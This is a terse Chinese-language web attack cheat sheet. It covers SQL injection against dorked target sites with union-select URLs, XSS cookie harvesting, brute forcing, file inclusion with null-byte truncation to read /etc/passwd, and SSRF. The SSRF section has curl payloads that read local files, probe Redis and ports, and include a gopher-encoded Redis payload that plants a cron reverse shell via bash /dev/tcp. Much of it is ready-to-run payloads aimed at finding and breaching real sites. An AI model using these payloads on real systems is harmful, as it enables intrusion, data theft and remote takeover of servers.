sql注入

• hack search 查找目標網(wǎng)站(inurl:"xxx.php?id=")
• url后追加'單引號，看情況，判定是否存在注入

字符串型注入

• 查看id=1 and 1=1 id=1 and 1=2結(jié)果一致，類型判定完畢
• 判定col數(shù)，這里可以用工具或手動
  http://www.xxxx.org/news.php?id=10040%27%20union%20select%201,database(),3,4,5%27

數(shù)字型注入

• 分別在url后追加id=1 and 1=1 id=1 and 1=2查看結(jié)果不一致，類型判定完畢
• 判定col數(shù)，這里可以用工具或手動
  http://xx.xx.fr/game.php?id=135%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12

xss

反射型

• 輸入</>&#，看返回情況

存儲型

• 輸入</>&#，看返回情況
• 利用xss平臺收集cookie信息

暴力破解

• github找字典，上工具

命令執(zhí)行

通過PHP的執(zhí)行函數(shù)時，exec_shell，system

文件包含

通過PHP的函數(shù)引入文件時，由于傳入的文件名沒有經(jīng)過合理的校驗

文件截斷

PHP內(nèi)核是由C語言實現(xiàn)的，因此使用了C語言中的一些字符串處理函數(shù)。在連接字符串時，0字節(jié)(\x00)將作為字符串的結(jié)束符。所以在這個地方，攻擊者只要在最后加入一個0字節(jié)，就能截斷file變量之后的字符串。

• ../etc/passwd\0
• ../etc/passwd%00

Session劫持

上傳

SSRF漏洞

服務(wù)端請求偽造,不限制協(xié)議，可以介入任意協(xié)議

CURL本地利用

• dict protocol (操作Redis)
  curl -vvv 'dict://127.0.0.1:6379/info'
• file
  curl -vvv 'file:///etc/passwd'

遠程利用

• 利用file協(xié)議任意文件讀取
  curl -v 'http://sec.com:8082/sec/ssrf.php?url=file:///etc/passwd'

• 利用dict協(xié)議查看端口
  curl -v 'http://sec.com:8082/sec/ssrf.php?url=dict://127.0.0.1:22'

• 利用gopher協(xié)議反彈shell
  curl -v 'http://sec.com:8082/sec/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

協(xié)議（基本跟SSRF沒差別）

php://input偽協(xié)議

php://filter偽協(xié)議

data://偽協(xié)議

phar://偽協(xié)議

弱類型

php

• '1a' == '1' 為true
• strcmp() php5.3后這函數(shù)如果比較成功則返回0.....